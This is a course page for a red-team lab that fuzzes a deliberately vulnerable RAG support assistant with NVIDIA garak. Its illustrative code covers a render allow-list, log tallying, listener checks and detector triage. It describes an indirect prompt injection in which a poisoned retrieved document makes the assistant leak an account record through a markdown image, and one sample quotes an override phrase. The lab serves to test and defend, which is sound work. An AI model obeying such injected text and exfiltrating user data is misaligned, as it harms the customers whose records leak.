Fuzz an LLM App with garak: Run, Read, and Triage True vs False Positives

Run NVIDIA garak as an automated fuzzer against a real, vulnerable RAG support assistant, read the JSONL run log and the per-probe DEFCON report, then practice the skill that separates a scanner operator from a red teamer: triaging the hits. Dismiss a detector false positive with evidence, confirm a genuine indirect prompt injection against an in-pod exfil listener, and watch the finding regress to zero after the fix ships.

90 min · 8 steps · 3 domains · Advanced

[Figure: "Map the attack surface". Pipeline nodes: Query, Retriever, LLM, Answer, plus a Poisoned doc (retrieved chunk). Readout: attack-success rate 0% (attacks blocked, benign answers pass), graded on real output, not the model's talk.]

What you'll learn

1. Recon: stand up the vulnerable target behind an OpenAI endpoint
   You are automating red-team testing of DV-RAG-Support, ACME Cloud's…
2. Run the scan: fire a broad garak discovery battery at the endpoint
   garak runs a battery of probes (attack generators) against a generator and…
3. Read the report: count hits per probe and grade the run
   A garak run produces several artifacts:
4. Triage a false positive: dismiss a detector hit with evidence
   Scanners over-report. The triage skill is asking, for every hit, "did the…
5. Confirm a true positive: run the custom probe, prove the effect on the listener
   A true positive is confirmed by reproducing the effect, not by trusting a…
6. Harden the render sink: allow-list the one channel the finding rode out on
   Switch hats. You confirmed a genuine finding in step 5, so now you ship the fix.
7. Distrust the retrieved context: reframe context as data, never instructions
   The render allow-list from step 6 is the load-bearing fix: it closes the exfil…
8. Verify the regression: fixed = 0 findings, reintroduced = re-trips
   A fix only counts when you re-run the exact confirmed attack and watch it fail.
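
The render allow-list named in step 6 could look roughly like the sketch below. It is an illustration, not the lab's actual fix: the host `static.acme.example`, the function name `sanitize_images`, and the replacement text are all hypothetical, and the regex only covers inline markdown images.

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list: the only host the chat UI may load images from.
ALLOWED_IMAGE_HOSTS = {"static.acme.example"}

# Inline markdown images only: ![alt](url) or ![alt](url "title").
IMAGE_PATTERN = re.compile(r'!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)')


def sanitize_images(markdown):
    """Keep images served over HTTPS from an allowed host; replace the rest."""

    def replace(match):
        alt, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        if parsed.scheme == "https" and parsed.hostname in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # allowed: leave the image untouched
        # Blocked: drop the URL entirely so nothing is fetched on render.
        return f"[image removed: {alt or 'untitled'}]"

    return IMAGE_PATTERN.sub(replace, markdown)


if __name__ == "__main__":
    answer = "Done. ![status](http://listener.internal/c?d=ACCT-4471)"
    print(sanitize_images(answer))
```

Filtering at the render sink means the exfil request is never issued even if the model still emits the injected image. A production version would also need to handle reference-style images and raw HTML, which this sketch ignores.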

Prerequisites

Comfortable reading Python and JSON
Completed (or understand) Module 2 indirect prompt injection
No ML background required

Exam domains covered

Offensive AI Security · LLM Application Security · Red-Team Automation

Skills & technologies you'll practice

This advanced-level AI/ML lab gives you real-world reps across:

garak · Fuzzing · Red-Team Automation · Triage · False Positives · Indirect Prompt Injection · OWASP LLM01 · AI Red Team

What you'll do in this lab

This is a hands-on red-team automation lab. You point NVIDIA garak, a batteries-included LLM fuzzer and scanner, at a real Retrieval-Augmented Generation (RAG) support assistant called DV-RAG-Support and run a battery of attack probes against it. garak fires predefined attack prompts, scores each response with detectors, and writes a JSONL run log plus a per-probe DEFCON grade. Your job is the part a scanner cannot do for you: read the run and triage every hit, separating a genuine finding from a detector that merely pattern-matched.
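
As a rough illustration of reading the run log, the sketch below tallies flagged responses per probe from JSONL text. The field names (`entry_type`, `probe`, `detector`, `passed`, `total`) are assumptions about the report schema and may differ between garak versions, and the sample records are invented for the example rather than taken from a real run.

```python
import json
from collections import defaultdict

# Invented sample records standing in for a run log; field names are assumed.
SAMPLE_LOG = """\
{"entry_type": "attempt", "probe_classname": "demo.ProbeA", "outputs": ["..."]}
{"entry_type": "eval", "probe": "demo.ProbeA", "detector": "demo.DetectorX", "passed": 18, "total": 20}
{"entry_type": "eval", "probe": "demo.ProbeB", "detector": "demo.DetectorY", "passed": 20, "total": 20}
"""


def hits_per_probe(jsonl_text):
    """Return {probe: (hits, total)} summed over every eval record."""
    tally = defaultdict(lambda: [0, 0])
    for line in jsonl_text.splitlines():
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        if record.get("entry_type") != "eval":
            continue  # skip attempts, setup records, and anything else
        total = record["total"]
        hits = total - record["passed"]  # responses the detector did not pass
        tally[record["probe"]][0] += hits
        tally[record["probe"]][1] += total
    return {probe: tuple(counts) for probe, counts in tally.items()}


if __name__ == "__main__":
    for probe, (hits, total) in sorted(hits_per_probe(SAMPLE_LOG).items()):
        print(f"{probe}: {hits}/{total} flagged")
```

A count like this only says where detectors fired. Each flagged response still has to be opened and judged before it is called a finding.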

You will dismiss a detector false positive with evidence from the run log, then confirm a genuine true positive the right way, by reproducing the effect against an in-pod exfil listener rather than trusting a detector score. The confirmed finding is an indirect prompt injection (OWASP LLM01) that leaks a customer's account record through an auto-rendered markdown image (OWASP LLM05 improper output handling), the same channel behind the real EchoLeak exploit. You finish by shipping the fix and re-running the battery to watch the finding regress to zero, the regression discipline a real red-team practice is built on.
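
Confirming the effect on the listener, and later confirming the regression to zero, can be sketched as a check over the listener's request log. The log format (one `METHOD PATH PROTOCOL` request line per entry), the canary value `ACCT-4471`, and the function name `exfil_hits` are assumptions made for this example, not details of the lab environment.

```python
from urllib.parse import parse_qs, urlparse


def exfil_hits(listener_log, canary):
    """Return logged request paths whose query string carries the canary."""
    hits = []
    for line in listener_log.splitlines():
        parts = line.split()
        # Assumed line shape: METHOD PATH PROTOCOL, e.g. "GET /c?d=... HTTP/1.1"
        if len(parts) < 2:
            continue
        path = parts[1]
        query = parse_qs(urlparse(path).query)  # also percent-decodes values
        if any(canary in value for values in query.values() for value in values):
            hits.append(path)
    return hits


# Invented log excerpts: one captured before the fix, one after.
BEFORE_FIX = (
    "GET /health HTTP/1.1\n"
    "GET /c?d=ACCT-4471%7Cjane%40example.com HTTP/1.1\n"
)
AFTER_FIX = "GET /health HTTP/1.1\n"

if __name__ == "__main__":
    print("before fix:", exfil_hits(BEFORE_FIX, "ACCT-4471"))
    print("after fix: ", exfil_hits(AFTER_FIX, "ACCT-4471"))
```

The same check serves both ends of the workflow: a non-empty result reproduces the finding, and an empty result on the identical attack after the fix is the regression evidence.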

Frequently asked questions

What is garak?

garak is NVIDIA's open-source LLM vulnerability scanner. You point it at a generator (a model or an LLM application behind an API), it runs predefined probes (attack generators), and detectors score each response. It is the discovery and fuzzing tool in a red-team toolkit: broad and opinionated, and it reports heuristic hits that you then triage.

What is the difference between a true and a false positive here?

A false positive is when a detector flags a response that did not actually achieve the attacker's goal: the model refused, or just quoted the payload, and a string-match detector counted it anyway. A true positive is a hit you can reproduce as a real effect. In this lab the true positive is an account record exfiltrating to an in-pod listener, which you confirm by reading the listener log, not by trusting a detector score.
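
The distinction can be made concrete with a toy string-match detector and a triage function that asks for evidence of the effect. This is a simplified sketch, not garak's detector code: the refusal markers, the labels, and the `effect_observed` flag (standing in for "the record showed up in the listener log") are all hypothetical.

```python
# Hypothetical refusal phrases; a real triage pass reads the full response.
REFUSAL_MARKERS = ("i can't", "i cannot", "i won't", "i'm unable")


def string_match_detector(output, trigger):
    """Naive detector: flags any response that contains the trigger text."""
    return trigger.lower() in output.lower()


def triage(output, trigger, effect_observed):
    """Label a response, given whether the attack's effect was reproduced."""
    if not string_match_detector(output, trigger):
        return "no hit"
    if effect_observed:
        return "true positive"  # the effect was reproduced, not just scored
    if any(marker in output.lower() for marker in REFUSAL_MARKERS):
        return "false positive"  # the model refused and merely quoted the payload
    return "unconfirmed"  # flagged, no refusal, no effect yet: reproduce it


if __name__ == "__main__":
    refusal = "I can't do that. I will not 'ignore previous instructions'."
    print(triage(refusal, "ignore previous instructions", effect_observed=False))
```

The refusal above trips the string match because it quotes the payload, which is exactly the kind of hit that gets dismissed with evidence rather than reported.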

Do I need a machine-learning background?

No. You read Python and JSON and reason about whether an attack actually fired. Everything model-specific is explained inline. The point of the lab is triage judgment and regression discipline, not model internals.